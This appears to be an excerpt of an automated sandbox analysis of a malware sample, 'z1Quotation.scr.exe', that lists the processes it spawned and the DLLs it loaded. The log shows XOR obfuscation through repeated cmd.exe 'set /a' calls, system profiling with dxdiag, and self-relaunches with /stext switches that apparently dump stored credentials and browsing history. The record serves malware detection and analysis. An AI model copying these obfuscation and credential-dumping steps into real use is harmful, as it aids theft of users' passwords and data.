                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Users\user\Desktop\z1Quotation.scr.exe "C:\Users\user\Desktop\z1Quotation.scr.exe"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\System32\dxdiag.exe" /t C:\Users\user\AppData\Local\Temp\sysinfo.txt
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Users\user\Desktop\z1Quotation.scr.exe C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\jcokhfyxinncnfcgtxknzv"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Users\user\Desktop\z1Quotation.scr.exe C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\hhsvynxt"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Users\user\Desktop\z1Quotation.scr.exe C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\pqvxpoqshoxjfvzq"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Users\user\Desktop\z1Quotation.scr.exe C:\Users\user\Desktop\z1Quotation.scr.exe /sort "Visit Time" /stext "C:\Users\user\AppData\Local\Temp\azdzamjeqinayzgxunqjk"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1412 -s 2348
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Users\user\Desktop\z1Quotation.scr.exe C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\xadmhfv"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Users\user\Desktop\z1Quotation.scr.exe C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\xpsjxjoeplzrro"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Users\user\Desktop\z1Quotation.scr.exe C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\gymlnlyltcmojzwgtmnvsm"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "197^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Users\user\Desktop\z1Quotation.scr.exe C:\Users\user\Desktop\z1Quotation.scr.exe /sort "Visit Time" /stext "C:\Users\user\AppData\Local\Temp\azdzamjeqinayzgxunqjk"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Users\user\Desktop\z1Quotation.scr.exe C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\xpsjxjoeplzrro"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Users\user\Desktop\z1Quotation.scr.exe "C:\Users\user\Desktop\z1Quotation.scr.exe"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\System32\dxdiag.exe" /t C:\Users\user\AppData\Local\Temp\sysinfo.txt
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Users\user\Desktop\z1Quotation.scr.exe C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\jcokhfyxinncnfcgtxknzv"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Users\user\Desktop\z1Quotation.scr.exe C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\hhsvynxt"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Users\user\Desktop\z1Quotation.scr.exe C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\pqvxpoqshoxjfvzq"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Users\user\Desktop\z1Quotation.scr.exe C:\Users\user\Desktop\z1Quotation.scr.exe /sort "Visit Time" /stext "C:\Users\user\AppData\Local\Temp\azdzamjeqinayzgxunqjk"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Users\user\Desktop\z1Quotation.scr.exe C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\xadmhfv"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Users\user\Desktop\z1Quotation.scr.exe C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\xpsjxjoeplzrro"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Users\user\Desktop\z1Quotation.scr.exe C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\gymlnlyltcmojzwgtmnvsm"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: pstorec.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: vaultcli.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: wintypes.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: dpapi.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: msasn1.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: edgegdi.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: wldp.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: pstorec.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: sspicli.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: msasn1.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: msasn1.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: edgegdi.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: wldp.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: msasn1.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: sspicli.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: version.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: wininet.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: edgegdi.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: userenv.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: profapi.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: wldp.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: version.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: wininet.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: edgegdi.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: wldp.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: pstorec.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: vaultcli.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: wintypes.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: dpapi.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: msasn1.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: edgegdi.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: wldp.dll
